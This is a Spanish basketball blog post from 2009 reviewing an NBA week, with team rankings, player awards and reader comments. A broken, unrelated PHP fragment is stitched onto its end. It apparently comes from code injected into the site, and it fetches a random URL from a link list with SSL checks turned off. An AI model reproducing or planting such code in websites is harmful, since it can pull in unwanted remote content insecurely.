Informe Semanal #2

09 de November de 2009 por TheDeerHunter

¿Porqué todos los jugones sonríen igual?

Esta semana, los Lakers tienen motivos para sonreír. Kobe saborea mieles de MVP mientras Mbenga y el banquillo se reivindican como competitivos. Quedar imbatidos siempre sabe bien. Muy poquitos hubiéramos apostado por ello sin Bynum ni Gasol.

Aun habiendo perdido su condición de invictos, los dos mejores equipos de la competición hasta la fecha siguen siendo Celtics y Suns. La noticia son los segundos, recuperando al mejor Nash, a Stoudamire e incluso a Richardson, recuperando crédito y con la mejor media anotadora de la liga. ¿Quién echa de menos a D’Antoni ahora?

Un peldaño por debajo destacaremos a los Bulls ganando todo esta semana e incluso permitiéndose el lujo de hacerle cosquillas a LeBron en su propia casa. Y todo sin encontrar todavía su mejor punto, los únicos en positivo con basketaverage negativo. Fastidia la lesión de Tyrus Thomas, pero menos si Taj Gibson le sustituye como viene haciéndolo.

Houston y Clippers deben de estar contentos por lo que han hecho esta semana. Nos alucina el trabajo de Adelman con los Rockets. ¿Quién si no podría llevar a los Brooks, Ariza, Battier, Scola y Hayes a ser uno de los equipos más anotadores de la liga? Pero también tendremos que reconocer esta vez sus méritos a Dunleavy. No es que se haya tenido que medir con los peores gallos de la liga pero ya se podría dar con un canto entre los dientes por quedar imbatido muchas semanas además de ésta.

Subidón de los Kings, en la semana de la lesión de Martin. Despertar de Tyreke Evans y 3 victorias que les colocan por encima de los Spurs, Jazz o Hornets en el Oeste.

Por último, Heat, Hawks, Mavs y Bucks han disfrutado de una semana positiva y continúan muy perfectamente situados.

Ganarás el pan con el sudor de tu frente.

Mal semana para Denver y Orlando, con lo bien que habían empezado. Los Nuggets han padecido un incómodo calendario y los Magic las lesiones. Los Cavs intentan encontrarse a si mismos, lo mismo que los Blazers aunque para ello tengan ahora que jugar con dos bases y Roy de alero sufriendo las de Caín. Visionario McMillan. Prefiere a Blake de escolta que a Rudy o Webster. Si me lo cuentan no me lo creo.

Los Raptors están jugando bien, aunque tienen que ajustar su defensa. Al contrario que Bobcats o Thunder, que están defendiendo bien pero deben ajustar su ataque. Tienen buena pinta, de momento.

Se dejaban llevar.

Se está convirtiendo en una tradición que los Spurs empiecen como la chata. Es unánime reconocer la extraordinaria plantilla que tienen pero el crédito no puede durar para siempre. La lesión de Parker no es excusa.

Sixers, Pistons o Pacers por unos u otros motivos no terminan de arrancar. Luego vendrán las prisas.

A los Hornets y los Jazz hay que darles de comer a parte. Con los, a priori, dos mejores bases de la liga, en estado de gracia, no son capaces de dar una a derechas. Sus defensas dan lástima para lo que estos equipos han sido.

El Carabasas Club

Marc se sale y no se pueden quejar del rendimiento que está dando Randolph pero el proyecto Iverson lo incendia todo. Memphis arde.

Qué lástima de semana la de los Wizards de Arenas… y los Nets tienen todos los números para hacer un 0-10 de comienzo.

Knicks, Warriors, Wolves… parece que el tiempo no pasa para ellos. En el peor sentido de la frase, lógicamente.

PREMIOS SEMANALES TJNBA

¿Qué has hecho tú que no hayamos hecho los demás?

Kobe Bryant ha comenzado la temporada sin Gasol y los 2 últimos partidos sin Bynum, con esto los Lakers han conseguido esta semana un 4-0 con un espectacular Bryant. Sus números son de 35.2 puntos, 4.5 rebotes, 2.5 asistencias, 2 robos y un 51% en tiros de campo, volviendo a los números pre-Gasol pero con mejores resultados colectivos. Otros candidatos son Dirk Nowitzki con 27 puntos, 8.3 rebotes, 3.7 asistencias y 2 tapones y Chris Bosh con 27-9 y un tremendo 62% en tiros

Al salir de clase

Sigue siendo el mejor novato Brandon ‘Smash’ Jennings, que además de lograr un balance positivo con los Bucks, promedia 17 puntos, 3.7 rebotes y 3.3 asistencias. Tyreke Evans con la lesión de Martin vuelve a su posición natural y lo ha agradecido con 16.7 puntos y 5 asistencias esta semana. El tercero en discordia hasta la fecha es Johny Flynn, con 13.3 puntos en las tres derrotas de los Wolves.

La vida puede ser maravillosa

Eramos muchos los que dudábamos de Chris Kaman tras su pésima temporada anterior, y hasta el momento no podemos hacer otra cosa que cerrar la boca y ver como esta semana ha promediado 24.3 puntos, 9.7 rebotes y 2 tapones con un 57.4% en tiros. A la altura de Dwight Howard.

Cortocircuitos S.L.

A la vez que Kaman se sale en los Clippers, Al Thornton ha perdido la titularidad en favor de Rasual Butler. En los 3 partidos que ha jugado desde el banco el equipo ha cosechado tres victorias, y no precisamente gracias a su aportación de 4.7 puntos, 1.3 rebotes y 1.3 asistencias en 18 minutos de juego. Una de las promesas que se queda atrás.

Comenta

7 comentarios a esta entrada

  1. Óscar dice:
    #1

    Acabo de leer en Marca.com un artículo sobre DeJuan Blair, del que se habla como decíamos en tjnba hace tiempo como el principal “robo” del último Draft.
    Aquí hablamos ya de que la única explicación de su puesto 37 de la 2ª ronda podría ser la incógnita de sus rodillas, porque a pesar de sus 2 metros y 120 kg sabíamos cómo se las gastaba en Pittsburgh.
    Lo que yo no sabía es esto: “Blair se rompió los cruzados en sus tiempos de High School. Su recuperación fue peculiar ya que tras ser operado los tejidos se reabsorbieron y Blair juega ahora sin ligamentos cruzados.
    ¿Es eso posible? Lo es. No es lo más frecuente del mundo, pero hay casos de deportistas profesionales que han jugado sin cruzados (me viene a la mente el del bético y barcelonista Cuéllar). ¿Cómo se sobrepone el organismo a ello? Con un fortalecimiento especial del cuádriceps y los isquiotibiales, que son los que tienen que aportar a las rodillas la estabilidad perdida por la ausencia de este ligamento”.
    Lo malo es que se asegura en el artículo que las carreras de deportistas con este tipo de problema suelen ser más cortas de lo normal… Aquí podemos empezar a comprender definitivamente el porqué de su puesto en el Draft. Aunque, que yo recuerde, este Ángel Cuéllar seguía jugando en un 2ªB con 35 ó 36 tacos… Esperemos que aguante muchos años este bicharraco, un auténtico jugadorazo.

      Citar

  2. Chris dice:
    #2

    ¡Puff! ¡lo de McMillan es de traca! Despues de una pésima primera semana consiente que Miller sea titular, mejorando los resultados y el aporte del jugador, pero a cambio mueve a Roy al puesto de 3, confundiendo completamente al pobre hombre, y deja a Blake de escolta titular en detrimento del propio Roy, de Rudy y de Webster. ¿Tan complicado es salir con un Miller-Roy-Webster-Aldridge-Oden y con Rudy o Outlaw de sexto hombre?… Debe ser que sí.

      Citar

  3. Óscar dice:
    #3

    Los caminos de McMillan son inexcrutables…
    Y le dará resultado, para más INRI… Quería mejorar en fluidez de circulación, movimiento y ritmo según el propio “Mac”… y parece que le está dando resultado, a pesar de lo extraño y extravagante de la apuesta de juntar como titulares a Miller, Blake y Roy (ayer 2 puntos !!).
    Ejemplos: la mejora del propio rendimiento de Andre, la defensa de perímetro, los 21 puntos en contraataque tras promediar unos paupérrimos 5.2 puntos en los 6 primeros partidos, y el caballo de batalla para Portland el año pasado.
    Más ejemplos: 35 asistencias y .500 en FGs — hasta ayer 17.8 y .424 en los partidos anteriores. Blazers, superó además por segunda vez los 100 puntos… 116, eso sí, a estos Wolves insulsos y por definirse…
    Y el banquillo mejor que nunca, con 11 tíos anotando al menos 6 puntos… bueno, 10 porque “The natural” se quedó en esos 2 puntitos (su anotación más baja desde el quinto partido de su temporada rookie, cuando jugó siete minutos debido a una lesión…).

      Citar

  4. rojorob dice:
    #4

    http://blogs.as.com/campoatras/2009/11/allen-iverson-el-viento-se-lleva-la-repuesta.html

    Seguro que ya lo habéis visto todos, pero por si acaso.

      Citar

  5. Love Denise dice:
    #5

    Sobre el tema de las lesiones, encontré un artículo que a mí me pareció bastante bueno. Quizás ya lo habeis leido, por si acaso lo dejo aquí

    http://managerfantastico.wordpress.com/category/lesiones/

      Citar

  6. xapa_croack dice:
    #6

    kaman jugador de la semana ¡¡¡

      Citar

  7. Viva_Dirk dice:
    #7

    Amar al baloncesto mas que a si mismo, juas juas, eso es imposible para un tipejo como Iverson.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>